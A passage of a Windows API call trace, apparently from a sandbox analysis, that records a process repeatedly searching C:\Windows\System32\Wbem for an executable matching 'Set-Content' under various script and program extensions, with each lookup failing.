lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.587] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content" (normalized: "c:\\windows\\set-content"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.588] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.ps1" (normalized: "c:\\windows\\system32\\wbem\\set-content.ps1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.588] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.589] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.psm1" (normalized: "c:\\windows\\system32\\wbem\\set-content.psm1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.589] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.psd1" (normalized: "c:\\windows\\system32\\wbem\\set-content.psd1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.590] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.COM" (normalized: "c:\\windows\\system32\\wbem\\set-content.com"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.590] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.EXE" (normalized: "c:\\windows\\system32\\wbem\\set-content.exe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.591] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.BAT" (normalized: "c:\\windows\\system32\\wbem\\set-content.bat"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.591] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.CMD" (normalized: "c:\\windows\\system32\\wbem\\set-content.cmd"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.592] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.VBS" (normalized: "c:\\windows\\system32\\wbem\\set-content.vbs"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.592] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.VBE" (normalized: "c:\\windows\\system32\\wbem\\set-content.vbe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.593] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.JS" (normalized: "c:\\windows\\system32\\wbem\\set-content.js"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.593] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.JSE" (normalized: "c:\\windows\\system32\\wbem\\set-content.jse"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.594] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.WSF" (normalized: "c:\\windows\\system32\\wbem\\set-content.wsf"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.594] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.594] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.WSH" (normalized: "c:\\windows\\system32\\wbem\\set-content.wsh"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.594] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.595] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.MSC" (normalized: "c:\\windows\\system32\\wbem\\set-content.msc"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.595] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.595] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content.CPL" (normalized: "c:\\windows\\system32\\wbem\\set-content.cpl"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.595] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, 